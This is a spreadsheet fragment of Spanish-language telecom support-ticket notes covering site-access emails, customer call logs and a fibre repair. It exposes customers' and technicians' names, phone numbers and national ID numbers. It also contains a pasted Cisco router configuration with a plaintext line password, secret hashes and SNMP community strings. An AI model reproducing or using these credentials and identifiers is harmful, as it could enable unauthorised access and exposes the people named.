CON RESPECTO A LOS PERMISOS DE INGRESO , LOS TÉCNICO YA SE PUEDEN PRESENTAR A LAS INSTALACIONES?
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT
DE: ZAMORA HERNÁNDEZ, CARLOS EDUARDO &lt;CZAMORA1@CEMPRO.COM&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 13:45
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; GERENTE1ATL@CONSTRUFACIL.COM.GT &lt;GERENTE1ATL@CONSTRUFACIL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | 425500012T | DIVISION DMC GUATEMALA S.A.
BUENA TARDE HECTOR, NOS INDICA CLARO QUE REALIZARAN UNA VISITA A SEDE PARA LA REVISIÓN DEL ENLACE, POR FAVOR PERMITIRLES EL ACCESO, CUALQUIER CONSULTA ESTOY A LA ORDEN. GRACIAS
SALUDOS,</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE , SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS ATENTOS  A LA RESPUESTA.
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 12:45
PARA: CZAMORA1@CEMPRO.COM &lt;CZAMORA1@CEMPRO.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 425500012T | DIVISION DMC GUATEMALA S.A.
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO , SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  KM 8.5 CARRETERA AL ALTLANTICO ZONA 18 MAYEN EL ATLANTICO
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
NOMBRE                                              IBM                           DPI
IVAN ARRAZOLA                                 951013                     2319 45019 0101
EDY ESCALANTE                                 562160                      1981 17108 0101
JOSE ANGEL SANDOVAL                   720711                      1796 76350 0101
RENE CAMEROS COJON                    532597                     2275 16001 0101
HECTOR ROLANDO ALINAN              535274                     1689 67987 0101
WILSON WILFREDO ECHEVERRIA    569109                     2592 44201 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE.
ASUNTO: INCIDENTE SD1134858 || 425500012 || DIVISION DMC GUATEMALA S.A.</t>
  </si>
  <si>
    <t>SIGUE SIN CONTESTAR SR. CARLOS ZAMORA 57947219 ID: 3001030929.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS ZAMORA 57947219  NO CONTESTA, ID: 3001030526. SE NECESITA REALIZAR PRUEBAS DE PRIMER NIVEL</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS ZAMORA 57947219   NO RESPONDE, SE INTENTARA LUEGO
-ID 3001122401</t>
  </si>
  <si>
    <t>F4600851</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SALVADOR HERNANDEZ 78609617 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001274970</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE  SALVADOR HERNANDEZ 78609617 PARA BRINDAR RETROALIMENTACION
-ID 3001125396</t>
  </si>
  <si>
    <t>F4600853</t>
  </si>
  <si>
    <t>LLUVIA EN SITIO NO PER,ITE TRABAJAR</t>
  </si>
  <si>
    <t>CLIENTE SALVADOR INDICA QUE ESTARA A LA ESPERA DE QUE EL PERSONAL LLEGUE A SOLVENTAR EL INCIDENTE ,,
FAVOR AL MOMENTO QUE EL CLIMA LO PERMIT SOLVENTAR FALLA.
3001039271
COLA:
NOMBRE: A: 50378609617
NÚMERO: 50378609617
DURACIÓN: 0:02:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50378609617
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 14/06/2022 09:15:06</t>
  </si>
  <si>
    <t>CLIENTE NO CONTENSTA LLAMDA SE INTENTARA DE NUEVO
3001244034
COLA:
NOMBRE: A: 50378609617
NÚMERO: 50378609617
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50378609617
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 15/06/2022 07:49:36</t>
  </si>
  <si>
    <t>PROBLEMAS EN RADIO BASE LA ODU SE ENCUENTRA DAÑADA A ESPERAR QUE EL CLIMA PERMITA HACER TRABAJOS CORRECTIVOS, TECNICOS SE PRESENTARON CON CLIENTE PARA INDICAR LA SITUACION EL VALIDA LA ESPERA POR CONDICIONES DE CLIMA
3001106322
COLA:
NOMBRE: A: 50379671898
NÚMERO: 50379671898
DURACIÓN: 0:01:47
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50379671898
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 14/06/2022 12:08:56</t>
  </si>
  <si>
    <t>CLIENTE ESTA INFIRMADO Y QUEDA A LA ESPERA DE QUE MEJORE EL CLIMA</t>
  </si>
  <si>
    <t>F4600868</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO GARCÍA-76071930 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001415784</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE 3 VECES HUGO GARCÍA-76071930 ##MANDA DIRECTO A BUZON ## VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A EJECTUVIO SALVADOR RIVAS-70690129 ## SE TIENE EN LINEA  ##   INDICA QUE EL CLIENTE NO QUIERE RENOVAR CONTRATO + QUE EL CLIENTE INIDCA QUE DESDE HACE 1 AÑO NO TIENE SERVICIO DE TELEFONIA E INTERNET + QUE CLARO NO LE SOLUCIONA---
SE OBSERVA QUE EL UTLIMO TICKET DE TELFONIA FUE EN ENERO Y EL PROBLEMA SE DETECTO EN PBX F4434538
####NOTA: PERSONAL DE COMERCIAL INIDCA QUE CLIENTE TRABAJA POR LAS NOCHES, POR LOQ UE SE RETOMARA TICKET POR LA TARDE, PARA QUE NOS PUEDA CONTESTAR EL CLIENTE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO GARCÍA-76071930 ## SE TIENE EN LINEA ## VIVO</t>
  </si>
  <si>
    <t>F4600875</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL CLIENTE QUIEN INDICA QUE YA ESTA FUNCIONANDO  EL E1, SE LLAMA AL GDN 22407200   ATIENDE CLAUDIA MARTINEZ
3001081508
COLA:
NOMBRE: A: 0050322407200
NÚMERO: 0050322407200
DURACIÓN: 0:00:03
ESTADO: MARCANDO
DETALLES: 0050322407200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 11:02:04</t>
  </si>
  <si>
    <t>F4600877</t>
  </si>
  <si>
    <t>SE ENTABLA COMUNICACION CON OSCAR GIRON QUIEN REPORTA EL INCIDENTE, SE VALIDA QUE SERVICIO NO ESTA DE BAJA, SE VALIDA QUE LOS EQUIPOS DE MOVISTAR SE DIERON DE BAJA
3001181067
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:01:26
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 14/06/2022 15:54:20</t>
  </si>
  <si>
    <t>CASO ESCALADO CON ÁREA COMERCIAL; SE LLAMÓ A EJECUTIVO 58261323 PARA SEGUIMIENTO NO CONTESTA; LLAMAR MAÑANA EN EL TRANSCURSO DEL DÍA, SE PIDE APOYO VÍA CORREO:
ASUNTO: TTK F4600877 // 233400023T // BANCO PROMERCIA DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>SE DETERMINA CON OSCAR GIRON Y TECNICO EN SITIO QUE NO EXISTE EQUIPOS DE CLARO EN SITIO DE CLIENTE,  SE VALIDA QUE ANTERIORMENTE SERVICIO ESTABA POR LA RED DE XT EL CUAL FUE DADO DE BAJA, OSCAR SOLICITA QUE SE ENVIE INFORMACION POR CORREO QUE EL ESTARA VALIDANDO CON CLIENTE, SE PASA FALLA A PC,
3001181067
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:12:35
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 14/06/2022 16:05:30</t>
  </si>
  <si>
    <t>**SE LLAMA A LA AGENCIA AL 24139090 PERO NO RESPONDE || SE INTENTARA LUEGO **
ID 3001059842 - 3001060260
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN  AL 24139168 INDICA QUE VA A TRANSFERIR LLAMADA AL PR PERO CONTESTA EL SEÑOR CARLOS E INDICA QUE SE LLAME A LA AGENCIA AL NUMERO 24139090 - EXT 805 -809
-ID 3001058244
**</t>
  </si>
  <si>
    <t>F4600881</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON 31925430 MENCIONA QUE YA SE COMUNICO CON LOS GUARDIAS PRA QUE DEN EL ACCESO
-ID 3001254918</t>
  </si>
  <si>
    <t>F4600882</t>
  </si>
  <si>
    <t>SW  YMORHNMRN1D1ENM1  YMRZ03/YO MORAZAN CELDA
RADIOBASE_UMTS ."YO_MORAZAN_NE_HND_LTE_CID_LYMRZ03"</t>
  </si>
  <si>
    <t>F4600885</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN FUENTES AL 49872286 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001063981
**</t>
  </si>
  <si>
    <t>F4600891</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE JAROL AL 57264358 INDICA QUE DESDE EL SABADO NO CUENTAN CON ENERGIA EN EL SITIO **
-ID 3001065999
**</t>
  </si>
  <si>
    <t>F4600903</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OBED PANAMEÑO 73196679 QUIEN INDICA QUE NO SE ENCUENTRA EN LAS INSTALACIONES, SOLICITA QUE SE CONTACTE AL NUMERO 74681537 PARA REALIZAR PRUEBAS CON LA COMPAÑERA EN SITIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OBED PANAMEÑO 73196679 PARA REALIZAR PRUEBAS, NOS ENVIA A BUZON, SE LLMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OBED PANAMEÑO 73196679 CLIENTE NO CONTESTA DESPUESDE VARIOS INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4600927</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  RICARDO AJPUAC || COMENTA QUE EL NO SE ENCUENTRA PERO SI HAY PERSONAL QUE NOS PUEDA ATENDER EN EL PUNTO || BRINDA CONTACTO SR  VALENTIN CHIQUIN 51154569 || CLIENTE RICRDO COMENTA QUE PRIMERO VALIDARA CON EL Y QUE SE LLAME EN 20 MINUTOS AL SEÑOR VALENTIN //
3001189682
NOMBRE: A: 55922230
COLA:
NÚMERO: 55922230
DURACIÓN: 0:03:04
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55922230
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LESTERL.RODAS
FECHA Y HORA LOCALES: 14/06/2022 16:17:38</t>
  </si>
  <si>
    <t>SE COORDINARÁ VISITA TÉCNICA MAÑANA A PARTIR DE LAS 07:00AM, ADICIONAL SE LLAMÓ A CLIENTE 58333064 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4600938</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEJANDRA MORALES AL 54867470 INDICA QUE AUN NO FUNCIONA LA LINEA QUE NO LE PERMITE REALIZAR LLAMADA Y SI LE LLAMAN SE CORTA LA LLAMADA || SE NOTIFICA A GESTOR  **
-ID 3001139314
**</t>
  </si>
  <si>
    <t>CLIENTE ALEJANDRA MORALES 54867470 VALIDA EL SERVICIO OPERATIVO, AUTORIZA EL CIERRE DEL CASO.
3001296240
COLA:
NOMBRE: A: 54867470
NÚMERO: 54867470
DURACIÓN: 0:00:49
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54867470
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 15/06/2022 10:25:18 A. M.</t>
  </si>
  <si>
    <t>F4600940</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROY CALDERON AL 89279267 INDICA QUE NO ESTA EN SITIO QUE ESTA COMO A 20 MTS DEL SITIO Y QUE NO PUEDE LLEGAR A REALIZAR PRUEBAS **
-ID 3001068869
**</t>
  </si>
  <si>
    <t>F4600954</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL MONGE 70700311 SE LE BRINDA DIAGNOSTICO Y MENCIONA QUE YA ESTA DANDO SEGUIMIENTO CON SU EJECUTIVA
-ID 3001158386</t>
  </si>
  <si>
    <t>F4600966</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL MONGE AL 70700311  SERVICIO ESTABLE SE LE INDICA SOBRE LA SATURACION DEL ANCHO DE BANDA **
-ID 3001061593
**</t>
  </si>
  <si>
    <t>F4600977</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                               TABLA DE ESCALACION DESPACHOS SV 				
	WO OPEN                                			10:30
1/5	RICARDO DE PAZ	78432633	2 HORAS	12:30:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	13:30:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	14:30:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	15:30:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	17:30:00</t>
  </si>
  <si>
    <t>F4600979</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE CARLOS RUBIO 60424388  ##VALIDA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS RUBIO 60424388  ## SE TIENE EN LINEA
3001068787
COLA:
NOMBRE: A: 0050360424388
NÚMERO: 0050360424388
DURACIÓN: 0:00:41
ESTADO: CONECTADA
DETALLES: 0050360424388
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 14/06/2022 10:31:07</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CARLOS RUBIO 60424388 SOLICITA QUE SE LE CONTACTE EN 10 MINUTOS</t>
  </si>
  <si>
    <t>FAVOR RESOLVER WO ### SE LLAMA A CLIENTE CARLOS RUBIO 60424388 COMENTA QUE ESTA EN SU HORA DE ALMUERZO, PIDE VALIDAR EN 1 HORA##
3001114221
COLA:
NOMBRE: A: 0050360424388
NÚMERO: 0050360424388
DURACIÓN: 0:01:12
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050360424388
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 14/06/2022 12:30:01</t>
  </si>
  <si>
    <t>SE DEBE VALIDAR CON CLIENTE SI YA POSEE SERVICIO DE LLAMAAS SALIENTES ### CLIENTE ANDA EN ALMUERZO</t>
  </si>
  <si>
    <t>F4600981</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR . ZEPEDA 45045611 MENCIONA QUE ES UNA AGENCIA DE CLARO Y UNICAMENTE TIENE PROBLEMA CON UNA PC SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001060779</t>
  </si>
  <si>
    <t>F4600992</t>
  </si>
  <si>
    <t>CAMBIIO DE TRAMO DE 100 METSO DE FIBRA OPTICA SE INSTALACION 2 MUFAS Y SE REALIZAN 2 FUSIONES
CAIDA TOTAL
SE PRESENTA PERSONAL DE PLEX
SE VE CORTE EN FIBRA OPTICA
SE REPARA TRAMO DE FIBRA SERVICIO RESTABLECE
CLIENTE VALIDA EN SITIO
&lt;PFLOGTSEN1D1B02B02EIM1&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.137.196
  PING 10.87.137.196: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.87.137.196 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/39 MS
&lt;PFLOGTSEN1D1B02B02EIM1&gt;TELNET VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.137.196
TRYING 10.87.137.196 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.137.196 ...
USER ACCESS VERIFICATION
PASSWORD:
PASSWORD:
PASSWORD:
% BAD PASSWORDS
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;PFLOGTSEN1D1B02B02EIM1&gt;TELNET VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.137.196
TRYING 10.87.137.196 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.137.196 ...
USER ACCESS VERIFICATION
PASSWORD:
PASSWORD:
PASSWORD:
% BAD PASSWORDS
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;PFLOGTSEN1D1B02B02EIM1&gt;TELNET VPN-INSTANCE INTERNET_GT_DEPTAL 10.87.137.196
TRYING 10.87.137.196 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.137.196 ...
USER ACCESS VERIFICATION
PASSWORD:
PASSWORD:
PASSWORD:
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN&gt;ENA
PASSWORD:
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#ENA
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2123 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$1OPQ$ILZAAY/BSUDAO5P1SKLLQ1
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC1926E0SC
!
!
USERNAME ZOAOLR PRIVILEGE 15 SECRET 5 $1$QZPI$NU8ACGKWNEOSNWKZDVH8E1
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.194.1 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/490900004T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.87.137.196 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.56.224.201 255.255.255.248
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 100
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.137.193
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY MON004909I RO
SNMP-SERVER COMMUNITY CISCO RO
SNMP-SERVER COMMUNITY CNOCR RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET.- 7 AVENIDA ZONA 1 SAN BENITO (ANTIGUAS BODEGAS DE PEPSI)
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
CONTROL-PLANE
!
!
!
LINE CON 0
 PASSWORD TELGUA
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 PASSWORD TELGUA
 LOGIN
 TRANSPORT INPUT TELNET
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#  SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.87.137.196   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         190.56.224.201  YES NVRAM  UP                    UP
LOOPBACK5                  10.212.194.1    YES NVRAM  UP                    UP
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.137.193           2   A4BE.2BE5.6287  ARPA   GIGABITETHERNET0/0
INTERNET  10.87.137.196           -   78BA.F9D1.29C0  ARPA   GIGABITETHERNET0/0
INTERNET  190.56.224.201          -   78BA.F9D1.29C1  ARPA   GIGABITETHERNET0/1
INTERNET  190.56.224.203          5   0090.7FE1.E03A  ARPA   GIGABITETHERNET0/1
INTERNET  190.56.224.204          0   INCOMPLETE      ARPA
INTERNET  190.56.224.205          0   INCOMPLETE      ARPA
INTERNET  190.56.224.206          0   INCOMPLETE      ARPA
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#SHO VER
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 06-FEB-15 17:01 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN UPTIME IS 1 DAY, 20 HOURS, 25 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.154-3.M2.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1926E0SC
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250864K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*1        CISCO1921/K9          FJC1926E0SC
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#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38000        13     13000        10         0
* GIGABITETHERNET0/1            0         0         0     86621     10000         6     21000         6         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_LOGISTICA_NAVE_GT_INTERNET_SAN_BENITO_PETEN#</t>
  </si>
  <si>
    <t>*** SE REALIZA CONFERENCIA CON FRANCISCO ZEPEDA (TÉCNICO) Y WILSON (CLIENTE). ESTE ÚLTIMO BRINDA INFORMACIÓN A PERSONAL TÉCNICO PARA PODER LLEGAR Y UBICAR LAS INSTALACIONES DE CLIENTE ***
3001098044
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7756
DURACIÓN: 0:00:51
ESTADO: CONECTADA
DETALLES: 7756
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ANGEL.TORRES
